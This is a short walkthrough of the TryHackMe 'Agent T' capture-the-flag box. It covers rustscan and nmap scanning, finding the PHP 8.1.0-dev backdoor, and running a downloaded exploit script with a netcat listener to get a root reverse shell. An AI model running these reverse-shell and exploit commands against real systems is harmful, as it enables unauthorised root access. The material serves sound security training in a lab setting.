TryHackMe CTF: Agent T
This box was fun. At first, I was looking in the wrong place. After a few moments I realized how dumb I was.
Let’s start off with port scanning. I used rustscan to do this.
[Screenshot: open port scan]
rustscan -a <IP> -r 1-65535
# -a <IP> : IP of the victim machine
# -r 1-65535 : port range to scan (1 to 65535)
Only port 80 (http) is open. There was nothing useful in the ‘View-Source’ page. So, the next step was to detect the version of the service running on port 80.
[Screenshot: nmap service scan]
nmap -sCV -p 80 <IP>
# -sCV : use default scripts and probe the port for version info
We can see that PHP version 8.1.0-dev is being used. This can also be found using Burp Suite:
[Screenshot: HTTP response in Burp]
If we do a quick Google search (something like ‘PHP 8.1.0-dev exploit’) we can find that there is a backdoor in that version. I found a useful reverse shell script here.
We can use this script to gain a reverse shell. But before that, we have to set up a netcat listener in a new terminal.
nc -lvp 1234
# -l : listen
# -v : verbose
# -p 1234 : on port 1234 (-p has to be specified just before the port ‘1234’)
After this, we can run the script:
python3 <downloaded_file.py> <http://victim_ip> <your_ip> <port>
<downloaded_file.py> : the script you downloaded from GitHub
There is a reverse shell connection in the tab where netcat is listening. There was no need for privilege escalation as I got the reverse shell as the ‘root’ user.
After traversing through some directories, I found the flag.
Enjoy!
Walkthrough credit goes to https://systemweakness.com/tryhackme-agent-t-d755f442a87b.